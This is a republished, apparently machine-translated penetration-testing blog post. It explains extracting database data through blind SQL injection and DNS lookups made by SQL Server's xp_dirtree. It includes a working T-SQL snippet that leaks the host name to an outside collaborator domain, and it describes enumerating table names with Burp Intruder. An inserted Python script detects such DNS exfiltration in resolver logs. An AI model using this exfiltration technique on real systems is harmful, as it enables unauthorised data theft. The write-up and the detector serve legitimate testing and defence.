
How to use DNS and SQLi to get data samples from a library

2025-01-18 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31 Report

In this issue, the editor explains how DNS and SQLi can be combined to pull data samples out of a database. The article is detailed and approaches the topic from a professional point of view; I hope you take something away from it.

There are many ways to leak data, but did you know that DNS and SQLi can be used together to retrieve data samples from a database? Below I introduce some techniques for enumerating and exfiltrating data from database servers through blind SQL injection.

In a recent web application test, I found a potential SQLi vulnerability. I eventually confirmed that the SQL injection was real through a DNS interaction with Burp's Collaborator service. I then tried SQLmap for further enumeration and extraction, but the WAF blocked the requests because of SQLmap's default request headers. I needed another way to verify the SQLi and to show that data could be recovered from the server.

In the previous article, I showed how xp_dirtree can be used through SQLi to capture the password hash of the SQL Server service account. I tried the same method here, but it failed because of outbound filtering on the client's firewall. That article also referenced GracefulSecurity's write-up, which comes in handy again here.

Even with outbound filtering in place, xp_dirtree can still be used to leak data from the network, because SQL Server must perform a DNS lookup for the host named in the xp_dirtree UNC path. We can therefore place the data in the host or subdomain portion of the domain name. For example, if I run a DNS server for collaborator.redsiege.net, I can force xp_dirtree to look up data.collaborator.redsiege.net; my DNS server receives the query for that name, and I can read the data straight out of the request. If that is still a little confusing, an example should make it clear.

Consider the following code:

DECLARE @data varchar(1024);
SELECT @data = (SELECT HOST_NAME());
EXEC('master.dbo.xp_dirtree "\\' + @data + '.collaborator.redsiege.net\foo$"');

In this SQL query we declare a variable named @data, populate it with the result of SELECT HOST_NAME(), and then run xp_dirtree against the UNC path \\hostname.collaborator.redsiege.net\foo$.

My test system is called INTRUDER. Executing this query on it produced a DNS lookup for INTRUDER.collaborator.redsiege.net, as shown below.

At this point I knew I had a reliable way to leak data, even if it had to be driven by hand. For this demonstration I use SQL Server Management Studio to issue the queries and display the results, but in practice this is not much different from doing it through SQLi; the only difference is that parts of the queries need to be URL encoded.
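From the defending side, the same property that makes this technique work (every xp_dirtree call produces a DNS query whose leftmost label is attacker-chosen data) is what makes it visible in resolver logs. The following script is an added example, not code from the article or from Red Siege: it parses BIND-style query-log lines (format assumed) and flags any parent zone that receives several distinct leftmost labels from a host on the SQL Server list. The log lines are constructed; only collaborator.redsiege.net comes from the article.

```python
"""Spot DNS-based data exfiltration (e.g. from xp_dirtree lookups) in resolver query logs."""
import re
from collections import defaultdict

# Constructed sample log lines in BIND query-log style (format assumed). The client
# 10.0.5.20 plays the SQL Server; 10.0.5.21 is ordinary workstation noise.
SAMPLE_LOG = """\
18-May-2024 10:01:02.101 client 10.0.5.20#51234: query: www.example.com IN A + (10.0.0.53)
18-May-2024 10:01:05.337 client 10.0.5.20#51240: query: INTRUDER.collaborator.redsiege.net IN A + (10.0.0.53)
18-May-2024 10:01:06.002 client 10.0.5.20#51241: query: Alpha.collaborator.redsiege.net IN A + (10.0.0.53)
18-May-2024 10:01:07.410 client 10.0.5.21#40001: query: www.example.org IN A + (10.0.0.53)
18-May-2024 10:01:08.555 client 10.0.5.20#51242: query: Beta.collaborator.redsiege.net IN A + (10.0.0.53)
18-May-2024 10:01:09.120 client 10.0.5.20#51243: query: Gamma.collaborator.redsiege.net IN A + (10.0.0.53)
"""

# Pulls the client IP, the queried name and the record type out of one log line.
QUERY_RE = re.compile(
    r"client (?P<client>\d{1,3}(?:\.\d{1,3}){3})#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def parse_query_log(text):
    """Return one record per recognised query line; unrecognised lines are skipped."""
    records = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            records.append({
                "client": m["client"],
                "qname": m["qname"].rstrip("."),  # drop the trailing root dot if present
                "qtype": m["qtype"],
            })
    return records


def find_dns_exfil(records, sql_server_ips, min_distinct=3):
    """Group queries from SQL Server hosts by parent zone and keep the leftmost labels.

    A zone that receives many *different* leftmost labels from one database host
    looks like a data channel rather than a normal name lookup. The split assumes
    one data label per query, as in the article; encodings that spread data over
    several labels would need a different split point.
    """
    seen = defaultdict(list)  # (client, parent zone) -> ordered distinct labels
    for r in records:
        if r["client"] not in sql_server_ips or "." not in r["qname"]:
            continue
        label, parent = r["qname"].split(".", 1)
        labels = seen[(r["client"], parent)]
        if label not in labels:  # keep original case: the leaked value may be case-sensitive
            labels.append(label)
    return {key: labels for key, labels in seen.items() if len(labels) >= min_distinct}


def report(findings):
    """Human-readable lines, one per suspicious (client, zone) pair, in log order."""
    return [
        f"{client} -> {zone}: {len(labels)} distinct labels, e.g. {', '.join(labels[:3])}"
        for (client, zone), labels in findings.items()
    ]


if __name__ == "__main__":
    hits = find_dns_exfil(parse_query_log(SAMPLE_LOG), sql_server_ips={"10.0.5.20"})
    for line in report(hits):
        print(line)
```

Run stand-alone it prints one line for 10.0.5.20 and collaborator.redsiege.net; the recovered label list is the data the attacker received, so the same output doubles as a scope assessment during incident response. The threshold and the SQL Server host list are the knobs to tune: a database server has few legitimate reasons to resolve many distinct names under a single external zone.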

In the following example, the query in the red box returns a table name from the Northwind database for us.

You should have noticed the two SELECT statements in this query. The inner SELECT (the nested one in the screenshot above) returns the top 10 table names from the Northwind database sorted in ascending alphabetical order. The outer (first) SELECT then takes the first row of that result set sorted in descending alphabetical order. The net effect is that the query retrieves the name of the 10th table in the Northwind database. Still a little confused? Let's break it down.

The inner SELECT on its own returns 10 results in ascending alphabetical order.

As shown below, the complete query returns only the name of the 10th table. This is because we first return 10 results in ascending alphabetical order, then run a second SELECT over them that returns only the first row in descending alphabetical order. The query therefore hands back only the 10th entry in the list of table names.

Knowing this, we can use Burp Intruder to iterate over all the table names by changing the row count in the inner (second) SELECT statement, increasing it by one with each request.

The above is how DNS and SQLi can be used together to retrieve data samples from a database. If you have run into similar questions, the analysis above should help you understand the approach.